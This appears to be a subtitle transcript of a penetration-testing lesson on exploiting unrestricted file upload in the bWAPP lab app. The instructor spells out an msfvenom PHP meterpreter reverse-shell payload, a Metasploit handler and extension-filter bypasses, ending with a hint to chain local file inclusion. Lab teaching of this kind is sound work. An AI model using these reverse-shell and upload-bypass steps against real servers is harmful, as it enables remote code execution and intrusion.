1 00:00:00,480 --> 00:00:07,680 Now, another problem that you will probably see while you're testing unrestricted file upload forms.
2 00:00:08,870 --> 00:00:12,800 And sometimes you can bypass restrictions if they're not properly coded.
3 00:00:13,780 --> 00:00:20,350 So in this lesson, we are going to be dealing with an unrestricted file upload challenge.
4 00:00:20,980 --> 00:00:28,420 You'll see why in a minute, so go to Kali and log in to bWAPP and open the unrestricted file upload page
5 00:00:28,420 --> 00:00:29,230 from the menu.
6 00:00:32,110 --> 00:00:36,100 Now, to see how it works, browse and then choose a picture on your computer.
7 00:00:38,010 --> 00:00:39,330 And then upload the file.
8 00:00:40,580 --> 00:00:42,230 And you will see a link below.
9 00:00:43,130 --> 00:00:44,990 So click it to visit the image.
10 00:00:45,770 --> 00:00:47,270 Yeah, it's uploaded.
11 00:00:48,890 --> 00:00:54,380 So, OK, enable FoxyProxy, and I'm going to arrange the view for you here.
12 00:00:54,410 --> 00:00:55,070 So.
13 00:00:56,690 --> 00:00:57,590 We can look at the code.
14 00:01:02,980 --> 00:01:04,870 Now, there's no check for the low level.
15 00:01:06,060 --> 00:01:09,930 But for medium, file upload check one is called.
16 00:01:11,180 --> 00:01:13,730 And for the high level, check two is called.
17 00:01:15,260 --> 00:01:15,640 OK.
18 00:01:15,680 --> 00:01:21,320 Exit. Now, I created a folder for this example before, so I'm going to go to that folder.
19 00:01:22,350 --> 00:01:25,890 And I'm going to prepare a shell with the msfvenom tool.
20 00:01:27,050 --> 00:01:34,850 So type msfvenom -p php/meterpreter/reverse_tcp for the payload.
21 00:01:38,130 --> 00:01:43,310 And LHOST equals one nine two one six eight two zero four two one two eight four,
22 00:01:43,320 --> 00:01:52,140 the local host address, and LPORT equals 4443 for the local port in Kali, and the file
23 00:01:52,140 --> 00:01:52,470 name.
24 00:01:54,220 --> 00:01:58,330 And now we can provide some other parameters to msfvenom.
25 00:02:00,200 --> 00:02:03,320 But we don't need this for this example.
26 00:02:04,340 --> 00:02:05,120 So.
27 00:02:07,720 --> 00:02:09,340 OK, the payload is created.
28 00:02:10,730 --> 00:02:14,840 So here it is, my folder, and this is the content.
29 00:02:16,320 --> 00:02:17,460 All right, so we're done here.
30 00:02:17,940 --> 00:02:19,980 So then go back to Firefox.
31 00:02:21,140 --> 00:02:26,780 Well, browse for images, but choose shell.php and upload it.
32 00:02:28,440 --> 00:02:30,660 Yeah, the request is in Burp on the right.
33 00:02:31,920 --> 00:02:34,080 And you can see the content of the file.
34 00:02:35,940 --> 00:02:40,200 And the content type is application/x-php.
35 00:02:40,980 --> 00:02:41,970 OK, so let it go.
36 00:02:44,060 --> 00:02:46,310 And the link appears on the page.
37 00:02:47,670 --> 00:02:49,980 But now, before clicking, let's go back to the terminal.
38 00:02:51,880 --> 00:02:55,930 Now, I forgot to create a handler to capture the reverse connection.
39 00:02:56,800 --> 00:02:58,030 So open Metasploit.
40 00:03:01,270 --> 00:03:05,470 OK, so use exploit/multi/handler.
41 00:03:07,120 --> 00:03:11,440 And then set the payload to reverse TCP.
42 00:03:15,610 --> 00:03:18,450 And you can set the local host to the IP address of Kali.
43 00:03:22,380 --> 00:03:24,720 And set the local port to 4443.
44 00:03:26,650 --> 00:03:28,900 So one more time, we'll show the options.
45 00:03:30,630 --> 00:03:34,920 And then type exploit -j to run a background job.
46 00:03:35,880 --> 00:03:39,690 OK, so go to Firefox and click here to see the shell.
47 00:03:41,580 --> 00:03:44,250 And the session is open in the terminal.
48 00:03:45,800 --> 00:03:48,470 So type sessions to list sessions.
49 00:03:49,800 --> 00:03:52,110 And interact with session one.
50 00:03:53,590 --> 00:03:53,940 Type.
51 00:03:54,580 --> 00:03:57,520 getuid for the user of the open shell.
52 00:03:58,660 --> 00:04:05,380 And then sysinfo, you see the basic info about the open shell. Exit the shell.
53 00:04:06,570 --> 00:04:10,260 And go back to Firefox, so now I will increase the level.
54 00:04:11,430 --> 00:04:12,420 So choose medium.
55 00:04:13,710 --> 00:04:15,540 And try to upload the shell again.
56 00:04:19,700 --> 00:04:23,600 And there's the error, because these extensions are not allowed.
57 00:04:25,360 --> 00:04:27,400 OK, so let's enable interception.
58 00:04:28,880 --> 00:04:30,800 And then upload the shell file again.
59 00:04:33,570 --> 00:04:35,150 The request is here in Burp.
60 00:04:37,130 --> 00:04:42,650 OK, so change the extension in the file name and just add 3 to the end.
61 00:04:43,520 --> 00:04:44,000 That's all.
62 00:04:45,110 --> 00:04:46,310 And send the request.
63 00:04:47,820 --> 00:04:51,540 And a link for viewing the uploaded image is right here on the page.
64 00:04:51,990 --> 00:04:55,680 But before we do that, let's, uh, let's grab a listener.
65 00:04:56,610 --> 00:05:01,380 So start the handler in Metasploit by typing exploit -j.
66 00:05:04,600 --> 00:05:05,710 Now, click the link.
67 00:05:07,790 --> 00:05:09,410 Perfect, session's open.
68 00:05:11,050 --> 00:05:12,940 So interact with session two.
69 00:05:14,730 --> 00:05:19,920 And we'll run getuid. The user is www-data.
70 00:05:21,050 --> 00:05:24,920 And sysinfo for the basic information about the shell.
71 00:05:26,270 --> 00:05:27,140 And then you can exit.
72 00:05:28,720 --> 00:05:30,400 Now, go back to Firefox again.
73 00:05:31,550 --> 00:05:33,950 And I'm going to increase the level one more.
74 00:05:35,070 --> 00:05:39,840 So select high and now try to upload the shell file again.
75 00:05:42,480 --> 00:05:43,860 And there's our friend, the error.
76 00:05:45,440 --> 00:05:55,340 But this time it allows only these extensions. OK, so enable interception and upload the file.
77 00:05:57,780 --> 00:06:02,150 And this time the problem can be solved by adding a suitable extension to the file name.
78 00:06:04,770 --> 00:06:06,180 And let it go.
79 00:06:08,420 --> 00:06:11,810 And there's the upload problem solved.
80 00:06:12,590 --> 00:06:13,220 Here's the link.
81 00:06:14,820 --> 00:06:16,980 So go to the terminal and start the handler.
82 00:06:18,270 --> 00:06:18,750 OK.
83 00:06:18,780 --> 00:06:19,740 It is done.
84 00:06:21,960 --> 00:06:22,800 Now, click the link.
85 00:06:24,870 --> 00:06:26,000 Hey, nothing happened.
86 00:06:27,260 --> 00:06:28,100 There's no session.
87 00:06:29,310 --> 00:06:30,000 It doesn't work.
88 00:06:31,040 --> 00:06:40,000 Because the application tries to open an image file, but remember, it's a PHP file, so it gets confused.
89 00:06:40,070 --> 00:06:42,230 It throws an error without executing it.
90 00:06:43,630 --> 00:06:46,960 So we cannot directly execute this shell.
91 00:06:47,880 --> 00:06:50,570 But remember, we discovered LFI on bWAPP.
92 00:06:51,270 --> 00:06:56,340 So we can use LFI to include our shell into the application.
93 00:06:57,350 --> 00:06:58,880 But that's for you to do.
94 00:06:59,330 --> 00:07:02,600 I know you know how, because we did LFI several times.
95 00:07:03,380 --> 00:07:04,160 Have fun with that.